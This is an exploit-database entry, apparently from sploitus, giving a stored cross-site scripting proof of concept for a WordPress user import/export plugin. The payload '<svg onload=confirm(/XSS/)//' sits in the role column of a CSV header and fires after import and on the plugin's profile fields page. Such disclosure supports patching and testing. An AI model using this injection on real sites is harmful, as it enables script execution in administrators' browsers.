Share
## https://sploitus.com/exploit?id=WPEX-ID:22FE68C4-8F47-491E-BE87-5E8E40535A82
As admin, import the below CSV file via Tools > Import and export users and customers (/wp-admin/tools.php?page=acui)

user_login	user_email	display_name	role<svg onload=confirm(/XSS/)//	first_name	last_name	billing_first_name	billing_last_name	billing_company	billing_email	billing_phone	billing_country	billing_address_1	billing_address_2	billing_city	billing_state	billing_postcode	shipping_first_name	shipping_last_name	shipping_company	shipping_country	shipping_address_1	shipping_address_2	shipping_city	shipping_state	shipping_postcode

Then the XSS will be triggered after the import, as well as in the Extra profile fields page of the plugin (/wp-admin/tools.php?page=acui&tab=columns)